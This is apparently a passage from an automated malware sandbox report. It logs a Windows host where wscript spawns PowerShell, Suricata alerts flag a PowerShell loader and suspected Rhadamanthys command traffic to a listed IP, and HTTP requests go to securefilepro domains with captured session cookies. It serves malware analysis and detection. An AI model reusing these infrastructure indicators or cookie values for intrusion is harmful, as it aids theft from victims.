            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: chrome.exeMemory has grown: Private usage: 7MB later: 44MB

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.16:49758 -> 216.58.206.33:443
            Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.2.16:49775
            Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.2.16:49797
            Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.2.16:49806
            Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.2.16:49805
            Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.2.16:49807
            Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.2.16:49813
            Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.2.16:49812
            Source: Network trafficSuricata IDS: 2823606 - Severity 1 - ETPRO EXPLOIT_KIT Possible Evil Redirect Leading to EK Dec 04 2016 : 45.223.19.158:443 -> 192.168.2.16:49735
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49757 -> 216.58.206.33:443
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49759 -> 185.166.143.49:443
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49758 -> 216.58.206.33:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49758 -> 216.58.206.33:443
            Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.2.16:49797
            Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.2.16:49806
            Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 185.208.159.170:2484 -> 192.168.2.16:49805
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.131
            Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.131
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: unknownTCP traffic detected without corresponding DNS query: 185.208.159.170
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: securefilepro.netlify.appConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /npm/javascript-obfuscator/dist/index.browser.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://securefilepro.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/jszip/3.10.1/jszip.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://securefilepro.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /portal/favicon.ico HTTP/1.1Host: securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://securefilepro.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /portal/favicon.ico HTTP/1.1Host: securefilepro.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://securefilepro.netlify.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==
            Source: global trafficHTTP traffic detected: GET /portal/styles.cc0a641a0c9da1ad.css HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /portal/runtime.5be9c3325b3311c4.js HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /portal/polyfills.4aee66a14cad3606.js HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /portal/main.690005fd134686e7.js HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /npm/alertifyjs@1.13.1/build/css/alertify.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://www.securefilepro.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /npm/alertifyjs@1.13.1/build/alertify.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=123035775 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /_Incapsula_Resource?SWKMTFSR=1&e=0.08098935374105776 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=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
            Source: global trafficHTTP traffic detected: GET /_Incapsula_Resource?SWKMTFSR=1&e=0.08098935374105776 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=77u4GsdbDUAdVe76gzjhmf8C5VjeX8955GcerWQQQC+6x+nj51nDONojIDiIXXNL9z3efMJNvQRJlyJmhU95e4dDl2ZomVcJgI3yKSbULzrbL9p8E+/Xy7Tl0aO8lmfiz6juoFvLp7didL5J3sAqVUitDPwrOz/opQGvpO1ZaBS2o4pPrNFbJC7xncRcCen24CN4UmKNUfATu7jsJcFpqWGqtJv/9wzE9tv9GTUe3i9w4F6cusANAc2JknMDxulchOxsMLJbFmEpp+NVa2uTG/nve/SHGSQIn09ZVmkuXgfznnv0ZlHxacNPjyDsbFtGhuP04sK1AOEpH840odKVLheb5G4PCtSVSq1acfl2nKmr5lRK8QqkjFIriYh0TdFbcqaeHeV7Qo8y6nXLVaz8GTDx5vgCC35jyAbZkC2uJN85avJ8rcpsvhISBQqE0m2sgreayO8Xc8vcNMHhGimcKKyPN/SXeNw/4MmM92ThCVfuSlcoKnO1Vu1SpEAjudDNAmAIOtOM4LsfAD/ooK9Zbwm6tSY3KumroDkpI/iuopC9ycrAYDgblCOonDKJVOrwS2s79R1UqPIeuA4MIVYz2yU8KUs6mJ34cZUOhwL2lgy5xhEZRRmG23qliQMXll9uSxJYjqGzJoJDfuLp3o3DXcJIh6jzUGh5cHrsYh2jwE/v+IILTXIEbwj8Uk44hdAnidfORJrle/p3FIAnMA062NDn33NFqKbcksk4f7hzqRDWCh+SnnSpBgHUDaBz4ePZSXTiCOh5OPF9Po1NdRHIaB4IKjgvEM6g0+BierkXfmg6gUZ6V67TG65f8GNf8YHyQ7mjBi6dbdevC/vOMr/1d91DoQI0ykMHIHBSTIcLL2kylOeFs6kvOvtDSFHlzfF0cxPoPmyRd+iRy4+AJ5SDBMI3wIttsSnGmeXm45cuIfceq4oLkvkW0wfAkYVSLf9vfl9OX3WoCJy2spjMhR7WTdPpYnrB39kIrFo1AtJXyajP9/du9ournJC6GOx/a2RHrtY8+wcxun9NTesU5hcxeo5+55rB5Ub2A2GBtt2lFthJCYjs49OB4bmD82lzqAnRd8uxA/Fr9pn85RoNt9PpVmsmj4bm1ht8dwKxkD5XxPEYab06LmJO7r/rs3fTgkcXtaGzPpqTWkxnqvAbDcU9rlJ0o5zikqwMmguYgnSLdvxOMr6Y5KJoKVZBhc2voiRIA7pcnovblP3rc8MOXiWdu0/9h+bGEvXktxpGRPiOGRF+J+VD5C/QVD/ovPu5SL2SXix8DLkHVmh95J5JbUBwABOM38WqBafU/kPV8sfpyb1nsPI51/hq6u1pNNyaxVFBPjKcuchy6xOJI454GD+R2oJ38ABkcCL4COZBSqHjIIzmUIN7p0HcFif0pbvyLTlpsbioMUwev750CTa7U3cXuGJG2EToNTcaSdqO8d5+kW3bFwOFEypsk1FVrbr1GFT15UA8g/ip10XJI0aW719R44TRGA7Xjn1C3h/7Au7cpDQS73z/fX3pvO1w2e2FLo9mQLGKecxckcB0+nRX45Fnyd6Md4mV6Ir241r+UcFONMx/gXwHj4LPr53VW0xZXlxE/Uzrs6EqKxUTlXZC+WjjGWNYwE/bti7ATKANbGXiNSq5TnOFOLhEGPE/UzyV2VG3h1P/YDf9DEQ2MmYcEMtylYbWH5cBHg3zsavUijg5BvfZwhXVvmRntwddQY9NA41RiXj5yL3VloBwEVzm5bdIiBB6AT5r3OAB1Wq8WOU1cZ5fJuJLXGtxS